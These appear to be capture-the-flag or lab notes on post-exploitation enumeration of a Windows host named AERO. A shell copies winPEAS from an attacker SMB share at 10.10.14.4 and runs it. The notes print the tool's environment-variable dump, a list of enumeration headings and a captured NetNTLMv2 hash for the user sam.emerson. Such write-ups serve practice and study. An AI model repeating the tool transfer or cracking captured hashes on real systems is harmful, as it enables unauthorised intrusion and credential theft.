PEAS
ps c:\Users\sam.emerson\Downloads> copy \\10.10.14.4\test\winPEASx64.exe .Delivery complete over the existing SMB
Executing PEAS
ENV
╔══════════╣ User Environment Variables
╚ Check for some passwords or keys in the env variables
COMPUTERNAME: AERO
PSExecutionPolicyPreference: Bypass
HOMEPATH: \Users\sam.emerson
LOCALAPPDATA: C:\Users\sam.emerson\AppData\Local
PSModulePath: C:\Users\sam.emerson\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
PROCESSOR_ARCHITECTURE: AMD64
Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\sam.emerson\AppData\Local\Microsoft\WindowsApps
CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
ProgramFiles(x86): C:\Program Files (x86)
PROCESSOR_LEVEL: 23
LOGONSERVER: \\AERO
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
HOMEDRIVE: C:
SystemRoot: C:\Windows
ALLUSERSPROFILE: C:\ProgramData
DriverData: C:\Windows\System32\Drivers\DriverData
USERPROFILE: C:\Users\sam.emerson
APPDATA: C:\Users\sam.emerson\AppData\Roaming
PROCESSOR_REVISION: 3100
USERNAME: sam.emerson
CommonProgramW6432: C:\Program Files\Common Files
OneDrive: C:\Users\sam.emerson\OneDrive
CommonProgramFiles: C:\Program Files\Common Files
OS: Windows_NT
USERDOMAIN_ROAMINGPROFILE: AERO
PROCESSOR_IDENTIFIER: AMD64 Family 23 Model 49 Stepping 0, AuthenticAMD
ComSpec: C:\Windows\system32\cmd.exe
PROMPT: $P$G
SystemDrive: C:
TEMP: C:\Users\SAM~1.EME\AppData\Local\Temp
ProgramFiles: C:\Program Files
NUMBER_OF_PROCESSORS: 2
TMP: C:\Users\SAM~1.EME\AppData\Local\Temp
ProgramData: C:\ProgramData
ProgramW6432: C:\Program Files
windir: C:\Windows
USERDOMAIN: AERO
PUBLIC: C:\Users\Public
╔══════════╣ System Environment Variables
╚ Check for some passwords or keys in the env variables
ComSpec: C:\Windows\system32\cmd.exe
DriverData: C:\Windows\System32\Drivers\DriverData
OS: Windows_NT
Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE: AMD64
PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
TEMP: C:\Windows\TEMP
TMP: C:\Windows\TEMP
USERNAME: SYSTEM
windir: C:\Windows
NUMBER_OF_PROCESSORS: 2
PROCESSOR_LEVEL: 23
PROCESSOR_IDENTIFIER: AMD64 Family 23 Model 49 Stepping 0, AuthenticAMD
PROCESSOR_REVISION: 3100LAPS
LSA Protection
Credentials Guard
Cached Creds
AV
UAC
PowerShell
.NET Versions
NTLM
sam.emerson::AERO:1122334455667788:5c2ebaa52dc32594ce5a66646be17a81:010100000000000044625cbe6e48da019aeda074cbf77f7d000000000800300030000000000000000000000000200000d3bc9e32dd95b435e864ffcc4137a71d73566e84b003f651c986ce3585d0cd080a00100000000000000000000000000000000000090000000000000000000000
Token Privileges (sam.emerson)
Logged Users
RDP Session
Modifiable Services
Active Window
Installed Programs
Scheduled Tasks
Initially discovered and enumerated
SMB
Stored Creds
Networks
Firewall
Office356 Endpoints by OneDrive
Interesting Files
